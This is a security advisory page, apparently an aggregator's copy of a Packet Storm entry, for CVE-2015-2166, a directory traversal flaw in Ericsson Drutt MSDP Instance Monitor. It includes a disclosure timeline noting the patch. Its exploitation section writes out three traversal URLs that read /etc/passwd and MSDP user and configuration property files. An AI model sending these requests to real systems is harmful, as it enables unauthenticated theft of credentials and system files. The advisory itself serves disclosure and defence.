Ericsson Drutt MSDP (Instance Monitor) Directory Traversal / File Access

🗓️ 01 Apr 2015 00:00:00Reported by Anastasios MonachosType

packetstorm🔗 packetstormsecurity.com👁 52 Views

Ericsson Drutt MSDP (Instance Monitor) Directory Traversal Vulnerability allows unauthenticated remote file acces

Reporter	Title	Published	Views	Family All 10
0day.today	Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal Vulnerability	2 Apr 201500:00	–	zdt
CNVD	Ericsson Drutt Mobile Service Delivery Platform Directory Traversal Vulnerability	7 Apr 201500:00	–	cnvd
CVE	CVE-2015-2166	6 Apr 201515:00	–	cve
Cvelist	CVE-2015-2166	6 Apr 201515:00	–	cvelist
Exploit DB	Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal	2 Apr 201500:00	–	exploitdb
exploitpack	Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal	2 Apr 201500:00	–	exploitpack
Nuclei	Ericsson Drutt MSDP - Local File Inclusion	6 Jun 202603:01	–	nuclei
NVD	CVE-2015-2166	6 Apr 201515:59	–	nvd
OpenVAS	Generic HTTP Directory Traversal / File Inclusion (Web Root) - Active Check	18 Apr 201700:00	–	openvas
Prion	Directory traversal	6 Apr 201515:59	–	prion

`+------------------------------------------------------------------------------------------------------+  
+ Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal Vulnerability and Arbitrary File Access +  
+------------------------------------------------------------------------------------------------------+  
Affected Product: Ericsson Drutt MSDP (Instance Monitor)  
Vendor Homepage : www.ericsson.com  
Version : 4, 5 and 6   
CVE v2 Vector : AV:N/AC:L/Au:N/C:P/I:N/A:N  
CVE : CVE-2015-2166  
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]  
Patched : Yes  
  
+-------------+  
+ Description +  
+-------------+  
Ericsson Drutt Mobile Service Delivery Platform (MSDP) is a complete business support system providing an SDP center for both on- and off-portal business that includes support for the retail, advertising and wholesale of a wide range of different products and services. The MSDP was originally developed by Drutt Corporation which Ericsson bought back in 2007. Drutt was converted into Ericsson SA SD&P and they are still developing the MSDP. The platform is available in three configurations which also can be combined in the same installation: Storefront, Mobile Marketing and Open Surf.  
  
The identified vulnerability affects the Instance Monitor component and allows a unauthenticated remote attacker to access arbitrary files on the file system.   
  
+----------------------+  
+ Exploitation Details +  
+----------------------+  
This vulnerability can be triggered via a simple, similar to the below HTTP GET request(s):  
  
http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd  
http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fopt/drutt/msdp/manager/conf/props/msdp-users.properties  
http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/opt/drutt/msdp/manager/conf/ccContext.properties  
  
+---------------------+  
+ Disclosure Timeline +  
+---------------------+  
17.Feb.2015 - Contacted Ericsson http://www.ericsson.com/feedback  
24.Feb.2015 - Ericsson responded with point of contact at Corporate Security Office  
24.Feb.2015 - Contacted Corporate Security Office team  
02.Mar.2015 - Ericsson Product Security Incident Response Team reverted via a secure channel  
02.Mar.2015 - Shared vulnerability details  
06.Mar.2015 - Ericsson confirmed the validity of the issues and started developing the patches  
08.Mar.2015 - Agreed on public disclosure timelines  
12.Mar.2015 - Patches released  
31.Mar.2015 - Public disclosure  
  
  
`

01 Apr 2015 00:00Current

EPSS0.73601